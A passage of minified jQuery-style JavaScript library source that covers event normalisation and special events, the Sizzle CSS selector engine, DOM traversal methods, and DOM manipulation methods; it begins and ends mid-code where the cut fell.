fix:function(a){if(a[G])return a;var b=a;a=c.Event(b);for(var d=this.props.length,f;d;){f=this.props[--d];a[f]=b[f]}if(!a.target)a.target=a.srcElement||s;if(a.target.nodeType===3)a.target=a.target.parentNode;if(!a.relatedTarget&&a.fromElement)a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement;if(a.pageX==null&&a.clientX!=null){b=s.documentElement;d=s.body;a.pageX=a.clientX+(b&&b.scrollLeft||d&&d.scrollLeft||0)-(b&&b.clientLeft||d&&d.clientLeft||0);a.pageY=a.clientY+(b&&b.scrollTop||
d&&d.scrollTop||0)-(b&&b.clientTop||d&&d.clientTop||0)}if(!a.which&&(a.charCode||a.charCode===0?a.charCode:a.keyCode))a.which=a.charCode||a.keyCode;if(!a.metaKey&&a.ctrlKey)a.metaKey=a.ctrlKey;if(!a.which&&a.button!==w)a.which=a.button&1?1:a.button&2?3:a.button&4?2:0;return a},guid:1E8,proxy:c.proxy,special:{ready:{setup:c.bindReady,teardown:c.noop},live:{add:function(a){c.event.add(this,a.origType,c.extend({},a,{handler:oa}))},remove:function(a){var b=true,d=a.origType.replace(O,"");c.each(c.data(this,
"events").live||[],function(){if(d===this.origType.replace(O,""))return b=false});b&&c.event.remove(this,a.origType,oa)}},beforeunload:{setup:function(a,b,d){if(this.setInterval)this.onbeforeunload=d;return false},teardown:function(a,b){if(this.onbeforeunload===b)this.onbeforeunload=null}}}};var Ca=s.removeEventListener?function(a,b,d){a.removeEventListener(b,d,false)}:function(a,b,d){a.detachEvent("on"+b,d)};c.Event=function(a){if(!this.preventDefault)return new c.Event(a);if(a&&a.type){this.originalEvent=
a;this.type=a.type}else this.type=a;this.timeStamp=J();this[G]=true};c.Event.prototype={preventDefault:function(){this.isDefaultPrevented=Z;var a=this.originalEvent;if(a){a.preventDefault&&a.preventDefault();a.returnValue=false}},stopPropagation:function(){this.isPropagationStopped=Z;var a=this.originalEvent;if(a){a.stopPropagation&&a.stopPropagation();a.cancelBubble=true}},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=Z;this.stopPropagation()},isDefaultPrevented:Y,isPropagationStopped:Y,
isImmediatePropagationStopped:Y};var Da=function(a){var b=a.relatedTarget;try{for(;b&&b!==this;)b=b.parentNode;if(b!==this){a.type=a.data;c.event.handle.apply(this,arguments)}}catch(d){}},Ea=function(a){a.type=a.data;c.event.handle.apply(this,arguments)};c.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){c.event.special[a]={setup:function(d){c.event.add(this,b,d&&d.selector?Ea:Da,a)},teardown:function(d){c.event.remove(this,b,d&&d.selector?Ea:Da)}}});if(!c.support.submitBubbles)c.event.special.submit=
{setup:function(){if(this.nodeName.toLowerCase()!=="form"){c.event.add(this,"click.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="submit"||d==="image")&&c(b).closest("form").length)return na("submit",this,arguments)});c.event.add(this,"keypress.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="text"||d==="password")&&c(b).closest("form").length&&a.keyCode===13)return na("submit",this,arguments)})}else return false},teardown:function(){c.event.remove(this,".specialSubmit")}};
if(!c.support.changeBubbles){var da=/textarea|input|select/i,ea,Fa=function(a){var b=a.type,d=a.value;if(b==="radio"||b==="checkbox")d=a.checked;else if(b==="select-multiple")d=a.selectedIndex>-1?c.map(a.options,function(f){return f.selected}).join("-"):"";else if(a.nodeName.toLowerCase()==="select")d=a.selectedIndex;return d},fa=function(a,b){var d=a.target,f,e;if(!(!da.test(d.nodeName)||d.readOnly)){f=c.data(d,"_change_data");e=Fa(d);if(a.type!=="focusout"||d.type!=="radio")c.data(d,"_change_data",
e);if(!(f===w||e===f))if(f!=null||e){a.type="change";return c.event.trigger(a,b,d)}}};c.event.special.change={filters:{focusout:fa,click:function(a){var b=a.target,d=b.type;if(d==="radio"||d==="checkbox"||b.nodeName.toLowerCase()==="select")return fa.call(this,a)},keydown:function(a){var b=a.target,d=b.type;if(a.keyCode===13&&b.nodeName.toLowerCase()!=="textarea"||a.keyCode===32&&(d==="checkbox"||d==="radio")||d==="select-multiple")return fa.call(this,a)},beforeactivate:function(a){a=a.target;c.data(a,
"_change_data",Fa(a))}},setup:function(){if(this.type==="file")return false;for(var a in ea)c.event.add(this,a+".specialChange",ea[a]);return da.test(this.nodeName)},teardown:function(){c.event.remove(this,".specialChange");return da.test(this.nodeName)}};ea=c.event.special.change.filters}s.addEventListener&&c.each({focus:"focusin",blur:"focusout"},function(a,b){function d(f){f=c.event.fix(f);f.type=b;return c.event.handle.call(this,f)}c.event.special[b]={setup:function(){this.addEventListener(a,
d,true)},teardown:function(){this.removeEventListener(a,d,true)}}});c.each(["bind","one"],function(a,b){c.fn[b]=function(d,f,e){if(typeof d==="object"){for(var j in d)this[b](j,f,d[j],e);return this}if(c.isFunction(f)){e=f;f=w}var i=b==="one"?c.proxy(e,function(k){c(this).unbind(k,i);return e.apply(this,arguments)}):e;if(d==="unload"&&b!=="one")this.one(d,f,e);else{j=0;for(var o=this.length;j<o;j++)c.event.add(this[j],d,i,f)}return this}});c.fn.extend({unbind:function(a,b){if(typeof a==="object"&&
!a.preventDefault)for(var d in a)this.unbind(d,a[d]);else{d=0;for(var f=this.length;d<f;d++)c.event.remove(this[d],a,b)}return this},delegate:function(a,b,d,f){return this.live(b,d,f,a)},undelegate:function(a,b,d){return arguments.length===0?this.unbind("live"):this.die(b,null,d,a)},trigger:function(a,b){return this.each(function(){c.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0]){a=c.Event(a);a.preventDefault();a.stopPropagation();c.event.trigger(a,b,this[0]);return a.result}},
toggle:function(a){for(var b=arguments,d=1;d<b.length;)c.proxy(a,b[d++]);return this.click(c.proxy(a,function(f){var e=(c.data(this,"lastToggle"+a.guid)||0)%d;c.data(this,"lastToggle"+a.guid,e+1);f.preventDefault();return b[e].apply(this,arguments)||false}))},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});var Ga={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};c.each(["live","die"],function(a,b){c.fn[b]=function(d,f,e,j){var i,o=0,k,n,r=j||this.selector,
u=j?this:c(this.context);if(c.isFunction(f)){e=f;f=w}for(d=(d||"").split(" ");(i=d[o++])!=null;){j=O.exec(i);k="";if(j){k=j[0];i=i.replace(O,"")}if(i==="hover")d.push("mouseenter"+k,"mouseleave"+k);else{n=i;if(i==="focus"||i==="blur"){d.push(Ga[i]+k);i+=k}else i=(Ga[i]||i)+k;b==="live"?u.each(function(){c.event.add(this,pa(i,r),{data:f,selector:r,handler:e,origType:i,origHandler:e,preType:n})}):u.unbind(pa(i,r),e)}}return this}});c.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "),
function(a,b){c.fn[b]=function(d){return d?this.bind(b,d):this.trigger(b)};if(c.attrFn)c.attrFn[b]=true});A.attachEvent&&!A.addEventListener&&A.attachEvent("onunload",function(){for(var a in c.cache)if(c.cache[a].handle)try{c.event.remove(c.cache[a].handle.elem)}catch(b){}});(function(){function a(g){for(var h="",l,m=0;g[m];m++){l=g[m];if(l.nodeType===3||l.nodeType===4)h+=l.nodeValue;else if(l.nodeType!==8)h+=a(l.childNodes)}return h}function b(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];
if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1&&!p){t.sizcache=l;t.sizset=q}if(t.nodeName.toLowerCase()===h){y=t;break}t=t[g]}m[q]=y}}}function d(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1){if(!p){t.sizcache=l;t.sizset=q}if(typeof h!=="string"){if(t===h){y=true;break}}else if(k.filter(h,[t]).length>0){y=t;break}}t=t[g]}m[q]=y}}}var f=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,
e=0,j=Object.prototype.toString,i=false,o=true;[0,0].sort(function(){o=false;return 0});var k=function(g,h,l,m){l=l||[];var q=h=h||s;if(h.nodeType!==1&&h.nodeType!==9)return[];if(!g||typeof g!=="string")return l;for(var p=[],v,t,y,S,H=true,M=x(h),I=g;(f.exec(""),v=f.exec(I))!==null;){I=v[3];p.push(v[1]);if(v[2]){S=v[3];break}}if(p.length>1&&r.exec(g))if(p.length===2&&n.relative[p[0]])t=ga(p[0]+p[1],h);else for(t=n.relative[p[0]]?[h]:k(p.shift(),h);p.length;){g=p.shift();if(n.relative[g])g+=p.shift();
t=ga(g,t)}else{if(!m&&p.length>1&&h.nodeType===9&&!M&&n.match.ID.test(p[0])&&!n.match.ID.test(p[p.length-1])){v=k.find(p.shift(),h,M);h=v.expr?k.filter(v.expr,v.set)[0]:v.set[0]}if(h){v=m?{expr:p.pop(),set:z(m)}:k.find(p.pop(),p.length===1&&(p[0]==="~"||p[0]==="+")&&h.parentNode?h.parentNode:h,M);t=v.expr?k.filter(v.expr,v.set):v.set;if(p.length>0)y=z(t);else H=false;for(;p.length;){var D=p.pop();v=D;if(n.relative[D])v=p.pop();else D="";if(v==null)v=h;n.relative[D](y,v,M)}}else y=[]}y||(y=t);y||k.error(D||
g);if(j.call(y)==="[object Array]")if(H)if(h&&h.nodeType===1)for(g=0;y[g]!=null;g++){if(y[g]&&(y[g]===true||y[g].nodeType===1&&E(h,y[g])))l.push(t[g])}else for(g=0;y[g]!=null;g++)y[g]&&y[g].nodeType===1&&l.push(t[g]);else l.push.apply(l,y);else z(y,l);if(S){k(S,q,l,m);k.uniqueSort(l)}return l};k.uniqueSort=function(g){if(B){i=o;g.sort(B);if(i)for(var h=1;h<g.length;h++)g[h]===g[h-1]&&g.splice(h--,1)}return g};k.matches=function(g,h){return k(g,null,null,h)};k.find=function(g,h,l){var m,q;if(!g)return[];
for(var p=0,v=n.order.length;p<v;p++){var t=n.order[p];if(q=n.leftMatch[t].exec(g)){var y=q[1];q.splice(1,1);if(y.substr(y.length-1)!=="\\"){q[1]=(q[1]||"").replace(/\\/g,"");m=n.find[t](q,h,l);if(m!=null){g=g.replace(n.match[t],"");break}}}}m||(m=h.getElementsByTagName("*"));return{set:m,expr:g}};k.filter=function(g,h,l,m){for(var q=g,p=[],v=h,t,y,S=h&&h[0]&&x(h[0]);g&&h.length;){for(var H in n.filter)if((t=n.leftMatch[H].exec(g))!=null&&t[2]){var M=n.filter[H],I,D;D=t[1];y=false;t.splice(1,1);if(D.substr(D.length-
1)!=="\\"){if(v===p)p=[];if(n.preFilter[H])if(t=n.preFilter[H](t,v,l,p,m,S)){if(t===true)continue}else y=I=true;if(t)for(var U=0;(D=v[U])!=null;U++)if(D){I=M(D,t,U,v);var Ha=m^!!I;if(l&&I!=null)if(Ha)y=true;else v[U]=false;else if(Ha){p.push(D);y=true}}if(I!==w){l||(v=p);g=g.replace(n.match[H],"");if(!y)return[];break}}}if(g===q)if(y==null)k.error(g);else break;q=g}return v};k.error=function(g){throw"Syntax error, unrecognized expression: "+g;};var n=k.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,
CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(g){return g.getAttribute("href")}},
relative:{"+":function(g,h){var l=typeof h==="string",m=l&&!/\W/.test(h);l=l&&!m;if(m)h=h.toLowerCase();m=0;for(var q=g.length,p;m<q;m++)if(p=g[m]){for(;(p=p.previousSibling)&&p.nodeType!==1;);g[m]=l||p&&p.nodeName.toLowerCase()===h?p||false:p===h}l&&k.filter(h,g,true)},">":function(g,h){var l=typeof h==="string";if(l&&!/\W/.test(h)){h=h.toLowerCase();for(var m=0,q=g.length;m<q;m++){var p=g[m];if(p){l=p.parentNode;g[m]=l.nodeName.toLowerCase()===h?l:false}}}else{m=0;for(q=g.length;m<q;m++)if(p=g[m])g[m]=
l?p.parentNode:p.parentNode===h;l&&k.filter(h,g,true)}},"":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("parentNode",h,m,g,p,l)},"~":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("previousSibling",h,m,g,p,l)}},find:{ID:function(g,h,l){if(typeof h.getElementById!=="undefined"&&!l)return(g=h.getElementById(g[1]))?[g]:[]},NAME:function(g,h){if(typeof h.getElementsByName!=="undefined"){var l=[];
h=h.getElementsByName(g[1]);for(var m=0,q=h.length;m<q;m++)h[m].getAttribute("name")===g[1]&&l.push(h[m]);return l.length===0?null:l}},TAG:function(g,h){return h.getElementsByTagName(g[1])}},preFilter:{CLASS:function(g,h,l,m,q,p){g=" "+g[1].replace(/\\/g,"")+" ";if(p)return g;p=0;for(var v;(v=h[p])!=null;p++)if(v)if(q^(v.className&&(" "+v.className+" ").replace(/[\t\n]/g," ").indexOf(g)>=0))l||m.push(v);else if(l)h[p]=false;return false},ID:function(g){return g[1].replace(/\\/g,"")},TAG:function(g){return g[1].toLowerCase()},
CHILD:function(g){if(g[1]==="nth"){var h=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(g[2]==="even"&&"2n"||g[2]==="odd"&&"2n+1"||!/\D/.test(g[2])&&"0n+"+g[2]||g[2]);g[2]=h[1]+(h[2]||1)-0;g[3]=h[3]-0}g[0]=e++;return g},ATTR:function(g,h,l,m,q,p){h=g[1].replace(/\\/g,"");if(!p&&n.attrMap[h])g[1]=n.attrMap[h];if(g[2]==="~=")g[4]=" "+g[4]+" ";return g},PSEUDO:function(g,h,l,m,q){if(g[1]==="not")if((f.exec(g[3])||"").length>1||/^\w/.test(g[3]))g[3]=k(g[3],null,null,h);else{g=k.filter(g[3],h,l,true^q);l||m.push.apply(m,
g);return false}else if(n.match.POS.test(g[0])||n.match.CHILD.test(g[0]))return true;return g},POS:function(g){g.unshift(true);return g}},filters:{enabled:function(g){return g.disabled===false&&g.type!=="hidden"},disabled:function(g){return g.disabled===true},checked:function(g){return g.checked===true},selected:function(g){return g.selected===true},parent:function(g){return!!g.firstChild},empty:function(g){return!g.firstChild},has:function(g,h,l){return!!k(l[3],g).length},header:function(g){return/h\d/i.test(g.nodeName)},
text:function(g){return"text"===g.type},radio:function(g){return"radio"===g.type},checkbox:function(g){return"checkbox"===g.type},file:function(g){return"file"===g.type},password:function(g){return"password"===g.type},submit:function(g){return"submit"===g.type},image:function(g){return"image"===g.type},reset:function(g){return"reset"===g.type},button:function(g){return"button"===g.type||g.nodeName.toLowerCase()==="button"},input:function(g){return/input|select|textarea|button/i.test(g.nodeName)}},
setFilters:{first:function(g,h){return h===0},last:function(g,h,l,m){return h===m.length-1},even:function(g,h){return h%2===0},odd:function(g,h){return h%2===1},lt:function(g,h,l){return h<l[3]-0},gt:function(g,h,l){return h>l[3]-0},nth:function(g,h,l){return l[3]-0===h},eq:function(g,h,l){return l[3]-0===h}},filter:{PSEUDO:function(g,h,l,m){var q=h[1],p=n.filters[q];if(p)return p(g,l,h,m);else if(q==="contains")return(g.textContent||g.innerText||a([g])||"").indexOf(h[3])>=0;else if(q==="not"){h=
h[3];l=0;for(m=h.length;l<m;l++)if(h[l]===g)return false;return true}else k.error("Syntax error, unrecognized expression: "+q)},CHILD:function(g,h){var l=h[1],m=g;switch(l){case "only":case "first":for(;m=m.previousSibling;)if(m.nodeType===1)return false;if(l==="first")return true;m=g;case "last":for(;m=m.nextSibling;)if(m.nodeType===1)return false;return true;case "nth":l=h[2];var q=h[3];if(l===1&&q===0)return true;h=h[0];var p=g.parentNode;if(p&&(p.sizcache!==h||!g.nodeIndex)){var v=0;for(m=p.firstChild;m;m=
m.nextSibling)if(m.nodeType===1)m.nodeIndex=++v;p.sizcache=h}g=g.nodeIndex-q;return l===0?g===0:g%l===0&&g/l>=0}},ID:function(g,h){return g.nodeType===1&&g.getAttribute("id")===h},TAG:function(g,h){return h==="*"&&g.nodeType===1||g.nodeName.toLowerCase()===h},CLASS:function(g,h){return(" "+(g.className||g.getAttribute("class"))+" ").indexOf(h)>-1},ATTR:function(g,h){var l=h[1];g=n.attrHandle[l]?n.attrHandle[l](g):g[l]!=null?g[l]:g.getAttribute(l);l=g+"";var m=h[2];h=h[4];return g==null?m==="!=":m===
"="?l===h:m==="*="?l.indexOf(h)>=0:m==="~="?(" "+l+" ").indexOf(h)>=0:!h?l&&g!==false:m==="!="?l!==h:m==="^="?l.indexOf(h)===0:m==="$="?l.substr(l.length-h.length)===h:m==="|="?l===h||l.substr(0,h.length+1)===h+"-":false},POS:function(g,h,l,m){var q=n.setFilters[h[2]];if(q)return q(g,l,h,m)}}},r=n.match.POS;for(var u in n.match){n.match[u]=new RegExp(n.match[u].source+/(?![^\[]*\])(?![^\(]*\))/.source);n.leftMatch[u]=new RegExp(/(^(?:.|\r|\n)*?)/.source+n.match[u].source.replace(/\\(\d+)/g,function(g,
h){return"\\"+(h-0+1)}))}var z=function(g,h){g=Array.prototype.slice.call(g,0);if(h){h.push.apply(h,g);return h}return g};try{Array.prototype.slice.call(s.documentElement.childNodes,0)}catch(C){z=function(g,h){h=h||[];if(j.call(g)==="[object Array]")Array.prototype.push.apply(h,g);else if(typeof g.length==="number")for(var l=0,m=g.length;l<m;l++)h.push(g[l]);else for(l=0;g[l];l++)h.push(g[l]);return h}}var B;if(s.documentElement.compareDocumentPosition)B=function(g,h){if(!g.compareDocumentPosition||
!h.compareDocumentPosition){if(g==h)i=true;return g.compareDocumentPosition?-1:1}g=g.compareDocumentPosition(h)&4?-1:g===h?0:1;if(g===0)i=true;return g};else if("sourceIndex"in s.documentElement)B=function(g,h){if(!g.sourceIndex||!h.sourceIndex){if(g==h)i=true;return g.sourceIndex?-1:1}g=g.sourceIndex-h.sourceIndex;if(g===0)i=true;return g};else if(s.createRange)B=function(g,h){if(!g.ownerDocument||!h.ownerDocument){if(g==h)i=true;return g.ownerDocument?-1:1}var l=g.ownerDocument.createRange(),m=
h.ownerDocument.createRange();l.setStart(g,0);l.setEnd(g,0);m.setStart(h,0);m.setEnd(h,0);g=l.compareBoundaryPoints(Range.START_TO_END,m);if(g===0)i=true;return g};(function(){var g=s.createElement("div"),h="script"+(new Date).getTime();g.innerHTML="<a name='"+h+"'/>";var l=s.documentElement;l.insertBefore(g,l.firstChild);if(s.getElementById(h)){n.find.ID=function(m,q,p){if(typeof q.getElementById!=="undefined"&&!p)return(q=q.getElementById(m[1]))?q.id===m[1]||typeof q.getAttributeNode!=="undefined"&&
q.getAttributeNode("id").nodeValue===m[1]?[q]:w:[]};n.filter.ID=function(m,q){var p=typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id");return m.nodeType===1&&p&&p.nodeValue===q}}l.removeChild(g);l=g=null})();(function(){var g=s.createElement("div");g.appendChild(s.createComment(""));if(g.getElementsByTagName("*").length>0)n.find.TAG=function(h,l){l=l.getElementsByTagName(h[1]);if(h[1]==="*"){h=[];for(var m=0;l[m];m++)l[m].nodeType===1&&h.push(l[m]);l=h}return l};g.innerHTML="<a href='#'></a>";
if(g.firstChild&&typeof g.firstChild.getAttribute!=="undefined"&&g.firstChild.getAttribute("href")!=="#")n.attrHandle.href=function(h){return h.getAttribute("href",2)};g=null})();s.querySelectorAll&&function(){var g=k,h=s.createElement("div");h.innerHTML="<p class='TEST'></p>";if(!(h.querySelectorAll&&h.querySelectorAll(".TEST").length===0)){k=function(m,q,p,v){q=q||s;if(!v&&q.nodeType===9&&!x(q))try{return z(q.querySelectorAll(m),p)}catch(t){}return g(m,q,p,v)};for(var l in g)k[l]=g[l];h=null}}();
(function(){var g=s.createElement("div");g.innerHTML="<div class='test e'></div><div class='test'></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){n.order.splice(1,0,"CLASS");n.find.CLASS=function(h,l,m){if(typeof l.getElementsByClassName!=="undefined"&&!m)return l.getElementsByClassName(h[1])};g=null}}})();var E=s.compareDocumentPosition?function(g,h){return!!(g.compareDocumentPosition(h)&16)}:
function(g,h){return g!==h&&(g.contains?g.contains(h):true)},x=function(g){return(g=(g?g.ownerDocument||g:0).documentElement)?g.nodeName!=="HTML":false},ga=function(g,h){var l=[],m="",q;for(h=h.nodeType?[h]:h;q=n.match.PSEUDO.exec(g);){m+=q[0];g=g.replace(n.match.PSEUDO,"")}g=n.relative[g]?g+"*":g;q=0;for(var p=h.length;q<p;q++)k(g,h[q],l);return k.filter(m,l)};c.find=k;c.expr=k.selectors;c.expr[":"]=c.expr.filters;c.unique=k.uniqueSort;c.text=a;c.isXMLDoc=x;c.contains=E})();var eb=/Until$/,fb=/^(?:parents|prevUntil|prevAll)/,
gb=/,/;R=Array.prototype.slice;var Ia=function(a,b,d){if(c.isFunction(b))return c.grep(a,function(e,j){return!!b.call(e,j,e)===d});else if(b.nodeType)return c.grep(a,function(e){return e===b===d});else if(typeof b==="string"){var f=c.grep(a,function(e){return e.nodeType===1});if(Ua.test(b))return c.filter(b,f,!d);else b=c.filter(b,f)}return c.grep(a,function(e){return c.inArray(e,b)>=0===d})};c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,f=0,e=this.length;f<e;f++){d=b.length;
c.find(a,this[f],b);if(f>0)for(var j=d;j<b.length;j++)for(var i=0;i<d;i++)if(b[i]===b[j]){b.splice(j--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,f=b.length;d<f;d++)if(c.contains(this,b[d]))return true})},not:function(a){return this.pushStack(Ia(this,a,false),"not",a)},filter:function(a){return this.pushStack(Ia(this,a,true),"filter",a)},is:function(a){return!!a&&c.filter(a,this).length>0},closest:function(a,b){if(c.isArray(a)){var d=[],f=this[0],e,j=
{},i;if(f&&a.length){e=0;for(var o=a.length;e<o;e++){i=a[e];j[i]||(j[i]=c.expr.match.POS.test(i)?c(i,b||this.context):i)}for(;f&&f.ownerDocument&&f!==b;){for(i in j){e=j[i];if(e.jquery?e.index(f)>-1:c(f).is(e)){d.push({selector:i,elem:f});delete j[i]}}f=f.parentNode}}return d}var k=c.expr.match.POS.test(a)?c(a,b||this.context):null;return this.map(function(n,r){for(;r&&r.ownerDocument&&r!==b;){if(k?k.index(r)>-1:c(r).is(a))return r;r=r.parentNode}return null})},index:function(a){if(!a||typeof a===
"string")return c.inArray(this[0],a?c(a):this.parent().children());return c.inArray(a.jquery?a[0]:a,this)},add:function(a,b){a=typeof a==="string"?c(a,b||this.context):c.makeArray(a);b=c.merge(this.get(),a);return this.pushStack(qa(a[0])||qa(b[0])?b:c.unique(b))},andSelf:function(){return this.add(this.prevObject)}});c.each({parent:function(a){return(a=a.parentNode)&&a.nodeType!==11?a:null},parents:function(a){return c.dir(a,"parentNode")},parentsUntil:function(a,b,d){return c.dir(a,"parentNode",
d)},next:function(a){return c.nth(a,2,"nextSibling")},prev:function(a){return c.nth(a,2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")?
a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,b){c.fn[a]=function(d,f){var e=c.map(this,b,d);eb.test(a)||(f=d);if(f&&typeof f==="string")e=c.filter(f,e);e=this.length>1?c.unique(e):e;if((this.length>1||gb.test(f))&&fb.test(a))e=e.reverse();return this.pushStack(e,a,R.call(arguments).join(","))}});c.extend({filter:function(a,b,d){if(d)a=":not("+a+")";return c.find.matches(a,b)},dir:function(a,b,d){var f=[];for(a=a[b];a&&a.nodeType!==9&&(d===w||a.nodeType!==1||!c(a).is(d));){a.nodeType===
1&&f.push(a);a=a[b]}return f},nth:function(a,b,d){b=b||1;for(var f=0;a;a=a[d])if(a.nodeType===1&&++f===b)break;return a},sibling:function(a,b){for(var d=[];a;a=a.nextSibling)a.nodeType===1&&a!==b&&d.push(a);return d}});var Ja=/ jQuery\d+="(?:\d+|null)"/g,V=/^\s+/,Ka=/(<([\w:]+)[^>]*?)\/>/g,hb=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,La=/<([\w:]+)/,ib=/<tbody/i,jb=/<|&#?\w+;/,ta=/<script|<object|<embed|<option|<style/i,ua=/checked\s*(?:[^=]|=\s*.checked.)/i,Ma=function(a,b,d){return hb.test(d)?
a:b+"></"+d+">"},F={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};F.optgroup=F.option;F.tbody=F.tfoot=F.colgroup=F.caption=F.thead;F.th=F.td;if(!c.support.htmlSerialize)F._default=[1,"div<div>","</div>"];c.fn.extend({text:function(a){if(c.isFunction(a))return this.each(function(b){var d=
c(this);d.text(a.call(this,b,d.text()))});if(typeof a!=="object"&&a!==w)return this.empty().append((this[0]&&this[0].ownerDocument||s).createTextNode(a));return c.text(this)},wrapAll:function(a){if(c.isFunction(a))return this.each(function(d){c(this).wrapAll(a.call(this,d))});if(this[0]){var b=c(a,this[0].ownerDocument).eq(0).clone(true);this[0].parentNode&&b.insertBefore(this[0]);b.map(function(){for(var d=this;d.firstChild&&d.firstChild.nodeType===1;)d=d.firstChild;return d}).append(this)}return this},
wrapInner:function(a){if(c.isFunction(a))return this.each(function(b){c(this).wrapInner(a.call(this,b))});return this.each(function(){var b=c(this),d=b.contents();d.length?d.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){c(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){c.nodeName(this,"body")||c(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.appendChild(a)})},
prepend:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,this)});else if(arguments.length){var a=c(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,
this.nextSibling)});else if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,c(arguments[0]).toArray());return a}},remove:function(a,b){for(var d=0,f;(f=this[d])!=null;d++)if(!a||c.filter(a,[f]).length){if(!b&&f.nodeType===1){c.cleanData(f.getElementsByTagName("*"));c.cleanData([f])}f.parentNode&&f.parentNode.removeChild(f)}return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++)for(b.nodeType===1&&c.cleanData(b.getElementsByTagName("*"));b.firstChild;)b.removeChild(b.firstChild);
return this},clone:function(a){var b=this.map(function(){if(!c.support.noCloneEvent&&!c.isXMLDoc(this)){var d=this.outerHTML,f=this.ownerDocument;if(!d){d=f.createElement("div");d.appendChild(this.cloneNode(true));d=d.innerHTML}return c.clean([d.replace(Ja,"").replace(/=([^="'>\s]+\/)>/g,'="$1">').replace(V,"")],f)[0]}else return this.cloneNode(true)});if(a===true){ra(this,b);ra(this.find("*"),b.find("*"))}return b},html:function(a){if(a===w)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(Ja,
""):null;else if(typeof a==="string"&&!ta.test(a)&&(c.support.leadingWhitespace||!V.test(a))&&!F[(La.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Ka,Ma);try{for(var b=0,d=this.length;b<d;b++)if(this[b].nodeType===1){c.cleanData(this[b].getElementsByTagName("*"));this[b].innerHTML=a}}catch(f){this.empty().append(a)}}else c.isFunction(a)?this.each(function(e){var j=c(this),i=j.html();j.empty().append(function(){return a.call(this,e,i)})}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&
this[0].parentNode){if(c.isFunction(a))return this.each(function(b){var d=c(this),f=d.html();d.replaceWith(a.call(this,b,f))});if(typeof a!=="string")a=c(a).detach();return this.each(function(){var b=this.nextSibling,d=this.parentNode;c(this).remove();b?c(b).before(a):c(d).append(a)})}else return this.pushStack(c(c.isFunction(a)?a():a),"replaceWith",a)},detach:function(a){return this.remove(a,true)},domManip:function(a,b,d){function f(u){return c.nodeName(u,"table")?u.getElementsByTagName("tbody")[0]||
